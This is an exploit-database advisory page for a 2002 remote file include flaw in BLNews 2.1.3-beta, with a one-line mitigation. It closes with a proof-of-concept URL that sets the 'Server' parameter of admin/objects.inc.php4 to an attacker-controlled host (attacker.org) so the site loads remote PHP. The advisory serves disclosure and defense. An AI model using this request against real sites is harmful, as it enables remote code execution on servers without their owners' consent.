header-logo
Suggest Exploit
vendor:
BLNews
by:
SecurityFocus
7.5
CVSS
HIGH
Remote File Include
98
CWE
Product Name: BLNews
Affected Version From: 2.1.3-beta
Affected Version To: 2.1.3-beta
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2002

BLNews Remote File Include Vulnerability

It has been reported that BLNews is prone to a remote file include vulnerability. This is due to the incorrection initilization of some PHP headers within the application. As a result, an attacker may be capable of executing arbitrary PHP commands within the context of the web server.

Mitigation:

Ensure that all user-supplied input is validated and filtered before being used in the application.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/7677/info

It has been reported that BLNews is prone to a remote file include vulnerability. This is due to the incorrection initilization of some PHP headers within the application. As a result, an attacker may be capable of executing arbitrary PHP commands within the context of the web server.

This vulnerability is said to affect BLNews version 2.1.3-beta, however other versions may also be affected. 

http://www.example.org/admin/objects.inc.php4?Server=http://www.attacker.org

Navigation

Suggest Exploit

Services By CQR